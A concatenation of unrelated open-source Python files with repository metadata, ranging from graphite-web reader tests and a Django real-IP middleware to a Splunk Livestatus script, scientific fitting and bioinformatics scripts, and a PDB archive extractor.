          frame: a 2-D or 3-D image array, used when the config 'values' entry is 'frames'.
'''
new_config = self._get_config()
if True or self._enough_time_has_passed(self.previous_config['FPS']):
# self.visualizer.update(new_config)
self.last_update_time = time.time()
final_image = self._update_frame(
trainable, arrays, frame, new_config)
self._update_recording(final_image, new_config)
##############################################################################
# @staticmethod
# def gradient_helper(optimizer, loss, var_list=None):
# '''A helper to get the gradients out at each step.
# Args:
# optimizer: the optimizer op.
# loss: the op that computes your loss value.
# Returns: the gradient tensors and the train_step op.
# '''
# if var_list is None:
# var_list = tf.trainable_variables()
# grads_and_vars = optimizer.compute_gradients(loss, var_list=var_list)
# grads = [pair[0] for pair in grads_and_vars]
# return grads, optimizer.apply_gradients(grads_and_vars)
# implements pytorch backward later
class BeholderHook():
pass
# """SessionRunHook implementation that runs Beholder every step.
# Convenient when using tf.train.MonitoredSession:
# ```python
# beholder_hook = BeholderHook(LOG_DIRECTORY)
# with MonitoredSession(..., hooks=[beholder_hook]) as sess:
# sess.run(train_op)
# ```
# """
# def __init__(self, logdir):
# """Creates new Hook instance
# Args:
# logdir: Directory where Beholder should write data.
# """
# self._logdir = logdir
# self.beholder = None
# def begin(self):
# self.beholder = Beholder(self._logdir)
# def after_run(self, run_context, unused_run_values):
# self.beholder.update(run_context.session)
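# Hedged usage sketch; the logdir and tensor name are hypothetical, and it assumes
# the pickled config's 'values' entry is 'arrays' so the arrays argument is rendered.
def _beholder_usage_example():
    beholder = Beholder(logdir='./runs/exp1')
    beholder.update(arrays=[(np.random.rand(64, 64), 'layer1/weights')])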
|
lanpa/tensorboardX
|
tensorboardX/beholder/beholder.py
|
Python
|
mit
| 8,355
| 0.000838
|
from .base import TestCase
import os
import shutil
import time
from django.conf import settings
import whisper
import gzip
from graphite.readers import WhisperReader, FetchInProgress, MultiReader, merge_with_cache
from graphite.wsgi import application # NOQA makes sure we have a working WSGI app
from graphite.node import LeafNode
class MergeWithCacheTests(TestCase):
maxDiff = None
def test_merge_with_cache_with_different_step_no_data(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, None))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='sum'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
expected_values.append(None)
self.assertEqual(expected_values, values)
def test_merge_with_cache_with_different_step_sum(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, 1))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='sum'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
expected_values.append(60)
self.assertEqual(expected_values, values)
def test_merge_with_cache_with_different_step_average(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, 1))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='average'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
expected_values.append(1)
self.assertEqual(expected_values, values)
def test_merge_with_cache_with_different_step_max(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, 1))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='max'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
expected_values.append(1)
self.assertEqual(expected_values, values)
def test_merge_with_cache_with_different_step_min(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, 1))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='min'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
expected_values.append(1)
self.assertEqual(expected_values, values)
def test_merge_with_cache_with_different_step_last(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, 1))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='last'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
expected_values.append(1)
self.assertEqual(expected_values, values)
def test_merge_with_cache_with_different_step_bad(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, 1))
# merge the db results with the cached results
with self.assertRaisesRegexp(Exception, "Invalid consolidation function: 'bad_function'"):
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='bad_function'
)
# In merge_with_cache, if the `values[i] = value` fails, then
# the try block catches the exception and passes. This tests
# that case.
def test_merge_with_cache_beyond_max_range(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size, start+window_size*2, 1):
cache_results.append((i, None))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='sum'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
expected_values.append(None)
self.assertEqual(expected_values, values)
def test_merge_with_cache_when_previous_window_in_cache(self):
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 3600 # (1 hour)
step = 60 # (1 minute)
# simulate db data, no datapoints for the given
# time window
values = self._create_none_window(step)
# simulate cached data with datapoints only
# from the previous window
cache_results = []
prev_window_start = start - window_size
prev_window_end = prev_window_start + window_size
for i in range(prev_window_start, prev_window_end, step):
cache_results.append((i, 1))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values
)
# the merged results should be a None window because:
# - db results for the window are None
# - cache does not contain relevant points
self.assertEqual(self._create_none_window(step), values)
@staticmethod
def _create_none_window(points_per_window):
return [None for _ in range(0, points_per_window)]
#
# Test MultiReader with multiple WhisperReader instances
#
class MultiReaderTests(TestCase):
start_ts = 0
# Create/wipe test whisper files
hostcpu = os.path.join(settings.WHISPER_DIR, 'hosts/hostname/cpu.wsp')
worker1 = hostcpu.replace('hostname', 'worker1')
worker2 = hostcpu.replace('hostname', 'worker2')
worker3 = hostcpu.replace('hostname', 'worker3')
worker4 = hostcpu.replace('hostname', 'worker4')
worker4 = worker4.replace('cpu.wsp', 'cpu.wsp.gz')
def create_whisper_hosts(self):
self.start_ts = int(time.time())
try:
os.makedirs(self.worker1.replace('cpu.wsp', ''))
os.makedirs(self.worker2.replace('cpu.wsp', ''))
os.makedirs(self.worker3.replace('cpu.wsp', ''))
os.makedirs(self.worker4.replace('cpu.wsp.gz', ''))
except OSError:
pass
whisper.create(self.worker1, [(1, 60)])
whisper.create(self.worker2, [(1, 60)])
open(self.worker3, 'a').close()
whisper.update(self.worker1, 1, self.start_ts)
whisper.update(self.worker2, 2, self.start_ts)
with open(self.worker1, 'rb') as f_in, gzip.open(self.worker4, 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
def wipe_whisper_hosts(self):
try:
os.remove(self.worker1)
os.remove(self.worker2)
os.remove(self.worker3)
os.remove(self.worker4)
shutil.rmtree(os.path.join(settings.WHISPER_DIR, 'hosts'))
except OSError:
pass
def test_MultiReader_init(self):
self.create_whisper_hosts()
self.addCleanup(self.wipe_whisper_hosts)
wr1 = WhisperReader(self.worker1, 'hosts.worker1.cpu')
node1 = LeafNode('hosts.worker1.cpu', wr1)
wr2 = WhisperReader(self.worker2, 'hosts.worker2.cpu')
node2 = LeafNode('hosts.worker2.cpu', wr2)
reader = MultiReader([node1, node2])
self.assertIsNotNone(reader)
# Confirm the intervals
# Because the intervals returned from Whisper are subsecond,
    # we truncate to int for this comparison; otherwise an exact match is impossible
def test_MultiReader_get_intervals(self):
self.create_whisper_hosts()
self.addCleanup(self.wipe_whisper_hosts)
wr1 = WhisperReader(self.worker1, 'hosts.worker1.cpu')
node1 = LeafNode('hosts.worker1.cpu', wr1)
wr2 = WhisperReader(self.worker2, 'hosts.worker2.cpu')
node2 = LeafNode('hosts.worker2.cpu', wr2)
reader = MultiReader([node1, node2])
intervals = reader.get_intervals()
for interval in intervals:
self.assertEqual(int(interval.start), self.start_ts-60)
self.assertEqual(int(interval.end), self.start_ts)
# Confirm fetch works.
def test_MultiReader_fetch(self):
self.create_whisper_hosts()
self.addCleanup(self.wipe_whisper_hosts)
wr1 = WhisperReader(self.worker1, 'hosts.worker1.cpu')
node1 = LeafNode('hosts.worker1.cpu', wr1)
wr2 = WhisperReader(self.worker2, 'hosts.worker2.cpu')
node2 = LeafNode('hosts.worker2.cpu', wr2)
reader = MultiReader([node1, node2])
results = reader.fetch(self.start_ts-5, self.start_ts)
self.assertIsInstance(results, FetchInProgress)
if isinstance(results, FetchInProgress):
results = results.waitForResults()
(_, values) = results
self.assertEqual(values, [None, None, None, None, 1.0])
# Confirm merge works.
def test_MultiReader_merge_normal(self):
results1 = ((1496252939, 1496252944, 1), [None, None, None, None, 1.0])
results2 = ((1496252939, 1496252944, 1), [1.0, 1.0, 1.0, 1.0, 1.0])
wr1 = WhisperReader(self.worker1, 'hosts.worker1.cpu')
node1 = LeafNode('hosts.worker1.cpu', wr1)
reader = MultiReader([node1])
(_, values) = reader.merge(results1, results2)
self.assertEqual(values, [1.0, 1.0, 1.0, 1.0, 1.0])
def test_MultiReader_merge_results1_finer_than_results2(self):
results1 = ((1496252939, 1496252944, 1), [1.0, None, None, None, 1.0])
results2 = ((1496252939, 1496252949, 5), [1.0, 1.0])
wr1 = WhisperReader(self.worker1, 'hosts.worker1.cpu')
node1 = LeafNode('hosts.worker1.cpu', wr1)
reader = MultiReader([node1])
(_, values) = reader.merge(results1, results2)
self.assertEqual(values, [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0])
def test_MultiReader_merge_results2_finer_than_results1(self):
results1 = ((1496252939, 1496252949, 5), [1.0, 1.0])
results2 = ((1496252939, 1496252944, 1), [1.0, None, 1.0, None, 1.0])
wr1 = WhisperReader(self.worker1, 'hosts.worker1.cpu')
node1 = LeafNode('hosts.worker1.cpu', wr1)
reader = MultiReader([node1])
(_, values) = reader.merge(results1, results2)
self.assertEqual(values, [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0])
def test_MultiReader_merge_results1_missing_some(self):
results1 = ((1496252939, 1496252944, 1), [1.0, None, None, None, 1.0])
results2 = ((1496252939, 1496252949, 1), [1.0, 1.0])
wr1 = WhisperReader(self.worker1, 'hosts.worker1.cpu')
node1 = LeafNode('hosts.worker1.cpu', wr1)
reader = MultiReader([node1])
(_, values) = reader.merge(results1, results2)
self.assertEqual(values, [1.0, 1.0, None, None, 1.0, None, None, None, None, None])
|
gwaldo/graphite-web
|
webapp/tests/test_readers_util.py
|
Python
|
apache-2.0
| 16,540
| 0.000665
|
# Copyright (c) 2012-2013 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Weigh cells by memory needed in a way that spreads instances.
"""
from oslo.config import cfg
from nova.cells import weights
ram_weigher_opts = [
cfg.FloatOpt('ram_weight_multiplier',
default=10.0,
help='Multiplier used for weighing ram. Negative '
'numbers mean to stack vs spread.'),
]
CONF = cfg.CONF
CONF.register_opts(ram_weigher_opts, group='cells')
class RamByInstanceTypeWeigher(weights.BaseCellWeigher):
"""Weigh cells by instance_type requested."""
def weight_multiplier(self):
return CONF.cells.ram_weight_multiplier
def _weigh_object(self, cell, weight_properties):
"""Use the 'ram_free' for a particular instance_type advertised from a
child cell's capacity to compute a weight. We want to direct the
build to a cell with a higher capacity. Since higher weights win,
we just return the number of units available for the instance_type.
"""
request_spec = weight_properties['request_spec']
instance_type = request_spec['instance_type']
memory_needed = instance_type['memory_mb']
ram_free = cell.capacities.get('ram_free', {})
units_by_mb = ram_free.get('units_by_mb', {})
return units_by_mb.get(str(memory_needed), 0)
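# Hedged illustration (the structures below are bare stand-ins, not real nova
# objects) of how _weigh_object() scores a cell: with
#   cell.capacities == {'ram_free': {'units_by_mb': {'2048': 12}}}
# and a request whose instance_type has memory_mb == 2048, the weigher returns 12,
# so cells with more free 2 GB slots win whenever ram_weight_multiplier is positive.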
|
ChinaMassClouds/copenstack-server
|
openstack/src/nova-2014.2/nova/cells/weights/ram_by_instance_type.py
|
Python
|
gpl-2.0
| 1,971
| 0
|
from django.conf import settings
from .func import (check_if_trusted,
get_from_X_FORWARDED_FOR as _get_from_xff,
get_from_X_REAL_IP)
trusted_list = (settings.REAL_IP_TRUSTED_LIST
if hasattr(settings, 'REAL_IP_TRUSTED_LIST')
else [])
def get_from_X_FORWARDED_FOR(header):
return _get_from_xff(header, trusted_list)
func_map = {'HTTP_X_REAL_IP': get_from_X_REAL_IP,
'HTTP_X_FORWARDED_FOR': get_from_X_FORWARDED_FOR}
real_ip_headers = (settings.REAL_IP_HEADERS
if hasattr(settings, 'REAL_IP_HEADERS')
else ['HTTP_X_REAL_IP', 'HTTP_X_FORWARDED_FOR'])
class DjangoRealIPMiddleware(object):
def process_request(self, request):
if not check_if_trusted(request.META['REMOTE_ADDR'], trusted_list):
            # Only headers from trusted IPs can be used
return
for header_name in real_ip_headers:
try:
# Get the parsing function
func = func_map[header_name]
# Get the header value
header = request.META[header_name]
except KeyError:
continue
# Parse the real ip
real_ip = func(header)
if real_ip:
request.META['REMOTE_ADDR'] = real_ip
break
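# Hedged configuration sketch for the Django settings this middleware reads; the
# addresses are examples only, and the dotted path matches this module:
#
#   REAL_IP_TRUSTED_LIST = ['127.0.0.1', '10.0.0.5']
#   REAL_IP_HEADERS = ['HTTP_X_REAL_IP', 'HTTP_X_FORWARDED_FOR']
#   MIDDLEWARE_CLASSES += ('http_realip.middlewares.DjangoRealIPMiddleware',)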
|
Daishi1223/py-http-realip
|
http_realip/middlewares.py
|
Python
|
mit
| 1,364
| 0.002933
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2015 ADHOC SA (http://www.adhoc.com.ar)
# All Rights Reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
    'name': 'Project and Analytic Account integration improvements',
'version': '8.0.1.0.0',
'category': 'Projects & Services',
'sequence': 14,
'summary': '',
'description': """
    Project and Analytic Account integration improvements.
    ======================================================
    Adds domain restrictions to project tasks so that only projects that use tasks and are not in a cancelled, done or template state can be chosen.
    Adds domain restrictions to timesheet records so that only
""",
'author': 'ADHOC SA',
'website': 'www.adhoc.com.ar',
'images': [
],
'depends': [
'project_timesheet',
'hr_timesheet_invoice',
],
'data': [
'project_timesheet_view.xml',
],
'demo': [
],
'test': [
],
'installable': True,
'auto_install': False,
'application': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
HBEE/odoo-addons
|
project_analytic_integration/__openerp__.py
|
Python
|
agpl-3.0
| 1,908
| 0.002096
|
# Script to request hosts with DOWN status and total hosts by accessing MK Livestatus
# Required field to be passed to this script from Splunk: n/a
import socket,string,sys,re,splunk.Intersplunk,mklivestatus
results = []
try:
results,dummyresults,settings = splunk.Intersplunk.getOrganizedResults()
for r in results:
try:
HOST = mklivestatus.HOST
PORT = mklivestatus.PORT
s = None
livehostsdown = 0
livehoststotal = 0
for h in HOST:
content = [ "GET hosts\nStats: state = 1\nStats: state != 9999\n" ]
query = "".join(content)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((h, PORT))
except socket.error, (value,message):
if s:
s.close()
#Error: Could not open socket: connection refused (MK Livestatus not setup in xinetd?)
break
s.send(query)
s.shutdown(socket.SHUT_WR)
data = s.recv(100000000)
data2 = (re.findall(r'(No UNIX socket)', data))
if data2:
#Error: MK Livestatus module not loaded?
s.close()
else:
livehosts2 = data.strip()
livehosts = livehosts2.split(";")
s.close()
livehostsdownind = int(livehosts[0])
livehoststotalind = int(livehosts[1])
livehostsdown = livehostsdown + livehostsdownind
livehoststotal = livehoststotal + livehoststotalind
r["livehostsdownstatus"] = livehostsdown
r["livehoststotalstatus"] = livehoststotal
except:
r["livehostsdownstatus"] = "0"
r["livehoststotalstatus"] = "0"
except:
import traceback
stack = traceback.format_exc()
results = splunk.Intersplunk.generateErrorResults("Error : Traceback: " + str(stack))
splunk.Intersplunk.outputResults( results )
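# Note (hedged): a Livestatus "GET hosts" query with two "Stats:" headers, as built
# above, is answered with a single semicolon-separated row such as "3;120\n"
# (hosts DOWN; hosts total), which is what the split(";") and int() conversions rely on.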
|
skywalka/splunk-for-nagios
|
bin/livehostsdownstatus.py
|
Python
|
gpl-3.0
| 1,840
| 0.044565
|
import pyspeckit
import os
from pyspeckit.spectrum.models import nh2d
import numpy as np
import astropy.units as u
if not os.path.exists('p-nh2d_spec.fits'):
import astropy.utils.data as aud
from astropy.io import fits
f = aud.download_file('https://github.com/pyspeckit/pyspeckit-example-files/raw/master/p-nh2d_spec.fits')
with fits.open(f) as ff:
ff.writeto('p-nh2d_spec.fits')
# Load the spectrum
spec = pyspeckit.Spectrum('p-nh2d_spec.fits')
# Determine rms from line free section and load into cube
rms = np.std(spec.data[10:340])
spec.error[:] = rms
# setup spectral axis
spec.xarr.refX = 110.153594*u.GHz
spec.xarr.velocity_convention = 'radio'
spec.xarr.convert_to_unit('km/s')
# define useful shortcuts for True and False
F=False
T=True
# Setup of matplotlib
import matplotlib.pyplot as plt
plt.ion()
# Add NH2D fitter
spec.Registry.add_fitter('nh2d_vtau', pyspeckit.models.nh2d.nh2d_vtau_fitter,4)
# run spectral fit using some reasonable guesses
spec.specfit(fittype='nh2d_vtau', guesses=[5.52, 2.15, 0.166, 0.09067],
verbose_level=4, signal_cut=1.5, limitedmax=[F,T,T,T], limitedmin=[T,T,T,T],
minpars=[0, 0, -1, 0.05], maxpars=[30.,50.,1,0.5], fixed=[F,F,F,F])
# plot best fit
spec.plotter(errstyle='fill')
spec.specfit.plot_fit()
#save figure
plt.savefig('example_p-NH2D.png')
|
jpinedaf/pyspeckit
|
examples/example_pNH2D.py
|
Python
|
mit
| 1,329
| 0.017306
|
#!/usr/bin/env python
import argparse
import os
import sqlite3
from Bio import SeqIO, SeqRecord, Seq
from Bio.Align.Applications import ClustalwCommandline
from Bio.Blast import NCBIXML
from Bio.Blast.Applications import NcbiblastnCommandline as bn
from Bio import AlignIO
AT_DB_FILE = 'AT.db'
BLAST_EXE = '~/opt/ncbi-blast-2.6.0+/bin/blastn'
BLAST_DB = '~/opt/ncbi-blast-2.6.0+/db/TAIR10'
CLUSTALW_EXE = '../../clustalw2'
def allgaps(seq):
"""Return a list with tuples containing all gap positions
and length. seq is a string."""
gaps = []
indash = False
for i, c in enumerate(seq):
if indash is False and c == '-':
c_ini = i
indash = True
dashn = 0
elif indash is True and c == '-':
dashn += 1
elif indash is True and c != '-':
indash = False
gaps.append((c_ini, dashn+1))
return gaps
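# Hedged worked example for allgaps() (values checked by hand, not by the authors):
#   allgaps('AT--GC---T')  ->  [(2, 2), (6, 3)]
# A trailing run of dashes is never closed by a base and so is not reported; iss()
# below sidesteps that case by stripping leading/trailing dashes first.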
def iss(user_seq):
"""Infer Splicing Sites from a FASTA file full of EST
sequences"""
with open('forblast','w') as forblastfh:
forblastfh.write(str(user_seq.seq))
blastn_cline = bn(cmd=BLAST_EXE, query='forblast',
db=BLAST_DB, evalue='1e-10', outfmt=5,
num_descriptions='1',
num_alignments='1', out='outfile.xml')
blastn_cline()
b_record = NCBIXML.read(open('outfile.xml'))
title = b_record.alignments[0].title
sid = title[title.index(' ')+1 : title.index(' |')]
# Polarity information of returned sequence.
# 1 = normal, -1 = reverse.
frame = b_record.alignments[0].hsps[0].frame[1]
# Run the SQLite query
conn = sqlite3.connect(AT_DB_FILE)
c = conn.cursor()
res_cur = c.execute('SELECT CDS, FULL_SEQ from seq '
'WHERE ID=?', (sid,))
cds, full_seq = res_cur.fetchone()
if cds=='':
print('There is no matching CDS')
exit()
# Check sequence polarity.
sidcds = '{0}-CDS'.format(sid)
sidseq = '{0}-SEQ'.format(sid)
if frame==1:
seqCDS = SeqRecord.SeqRecord(Seq.Seq(cds),
id = sidcds,
name = '',
description = '')
fullseq = SeqRecord.SeqRecord(Seq.Seq(full_seq),
id = sidseq,
name='',
description='')
else:
seqCDS = SeqRecord.SeqRecord(
Seq.Seq(cds).reverse_complement(),
id = sidcds, name='', description='')
fullseq = SeqRecord.SeqRecord(
Seq.Seq(full_seq).reverse_complement(),
id = sidseq, name = '', description='')
# A tuple with the user sequence and both AT sequences
    allseqs = (user_seq, seqCDS, fullseq)
with open('foralig.txt','w') as trifh:
# Write the file with the three sequences
SeqIO.write(allseqs, trifh, 'fasta')
# Do the alignment:
outfilename = '{0}.aln'.format(user_seq.id)
cline = ClustalwCommandline(CLUSTALW_EXE,
infile = 'foralig.txt',
outfile = outfilename,
)
cline()
# Walk over all sequences and look for query sequence
for seq in AlignIO.read(outfilename, 'clustal'):
if user_seq.id in seq.id:
seqstr = str(seq.seq)
gaps = allgaps(seqstr.strip('-'))
break
print('Original sequence: {0}'.format(user_seq.id))
print('\nBest match in AT CDS: {0}'.format(sid))
acc = 0
for i, gap in enumerate(gaps):
print('Putative intron #{0}: Start at position {1}, '
'length {2}'.format(i+1, gap[0]-acc, gap[1]))
acc += gap[1]
print('\n{0}'.format(seqstr.strip('-')))
print('\nAlignment file: {0}\n'.format(outfilename))
description = 'Program to infer intron position based on ' \
'Arabidopsis Thaliana genome'
parser = argparse.ArgumentParser(description=description)
ifh = 'FASTA formatted file with sequence to search for introns'
parser.add_argument('input_file', help=ifh)
args = parser.parse_args()
seqhandle = open(args.input_file)
records = SeqIO.parse(seqhandle, 'fasta')
for record in records:
iss(record)
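# Example invocation (a sketch; 'my_ests.fasta' is a hypothetical input file,
# and AT_DB_FILE, BLAST_EXE, BLAST_DB and CLUSTALW_EXE above must point to
# real local resources for the run to succeed):
#
#   python estimateintrons.py my_ests.fasta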
|
Serulab/Py4Bio
|
code/ch20/estimateintrons.py
|
Python
|
mit
| 4,302
| 0.006044
|
# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM15.Element import Element
class Season(Element):
"""A specified time period of the year, e.g., Spring, Summer, Fall, WinterA specified time period of the year, e.g., Spring, Summer, Fall, Winter
"""
def __init__(self, name="winter", startDate='', endDate='', SeasonDayTypeSchedules=None, *args, **kw_args):
"""Initialises a new 'Season' instance.
        @param name: Name of the Season. Values are: "winter", "summer", "fall", "spring"
@param startDate: Date season starts
@param endDate: Date season ends
@param SeasonDayTypeSchedules: Schedules that use this Season.
"""
        #: Name of the Season. Values are: "winter", "summer", "fall", "spring"
self.name = name
#: Date season starts
self.startDate = startDate
#: Date season ends
self.endDate = endDate
self._SeasonDayTypeSchedules = []
self.SeasonDayTypeSchedules = [] if SeasonDayTypeSchedules is None else SeasonDayTypeSchedules
super(Season, self).__init__(*args, **kw_args)
_attrs = ["name", "startDate", "endDate"]
_attr_types = {"name": str, "startDate": str, "endDate": str}
_defaults = {"name": "winter", "startDate": '', "endDate": ''}
_enums = {"name": "SeasonName"}
_refs = ["SeasonDayTypeSchedules"]
_many_refs = ["SeasonDayTypeSchedules"]
def getSeasonDayTypeSchedules(self):
"""Schedules that use this Season.
"""
return self._SeasonDayTypeSchedules
def setSeasonDayTypeSchedules(self, value):
for x in self._SeasonDayTypeSchedules:
x.Season = None
for y in value:
y._Season = self
self._SeasonDayTypeSchedules = value
SeasonDayTypeSchedules = property(getSeasonDayTypeSchedules, setSeasonDayTypeSchedules)
def addSeasonDayTypeSchedules(self, *SeasonDayTypeSchedules):
for obj in SeasonDayTypeSchedules:
obj.Season = self
def removeSeasonDayTypeSchedules(self, *SeasonDayTypeSchedules):
for obj in SeasonDayTypeSchedules:
obj.Season = None
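# Minimal usage sketch (an illustration, not part of the original CIM15 code):
# a stand-in object with a 'Season' attribute is enough to show how the
# add/remove helpers maintain the back-reference; real code would pass
# SeasonDayTypeSchedule instances instead.
if __name__ == '__main__':
    class _FakeSchedule(object):
        Season = None

    summer = Season(name="summer", startDate="2011-06-01", endDate="2011-08-31")
    schedule = _FakeSchedule()
    summer.addSeasonDayTypeSchedules(schedule)
    assert schedule.Season is summer
    summer.removeSeasonDayTypeSchedules(schedule)
    assert schedule.Season is None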
|
rwl/PyCIM
|
CIM15/IEC61970/LoadModel/Season.py
|
Python
|
mit
| 3,209
| 0.002805
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import argparse
import shutil
import urllib2
from contextlib import closing
from os.path import basename
import gzip
import tarfile
# argparse for information
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--directory", help="input directory")
parser.add_argument("-r", "--remove", action="store_true", help="removes the .gz file after extracting")
args = parser.parse_args()
# sanity check
if not len(sys.argv) > 1:
print "This script extracts all .gz files (not jet .tar) in a given directory, including sub directories."
print "Which directory (including sub directories) would you like to extract?"
parser.print_help()
sys.exit(0)
input = args.directory
# in case of an extraction error caused by a download error, reload the file
def reload_file(file, dirpath):
print "reloading file: " + file
print 'ftp://ftp.rcsb.org/pub/pdb/data/structures/divided/' + dirpath + "/" + file
with closing(urllib2.urlopen('ftp://ftp.rcsb.org/pub/pdb/data/structures/divided/' + dirpath + "/" + file)) as r:
with open(dirpath + "/" + file, 'wb') as reloaded_file:
shutil.copyfileobj(r, reloaded_file)
with gzip.open((os.path.join(dirpath, file)), 'rb') as f:
file_content = f.read()
extracted_file = open((os.path.join(dirpath, os.path.splitext(file)[0])), 'w')
extracted_file.write(file_content)
extracted_file.close()
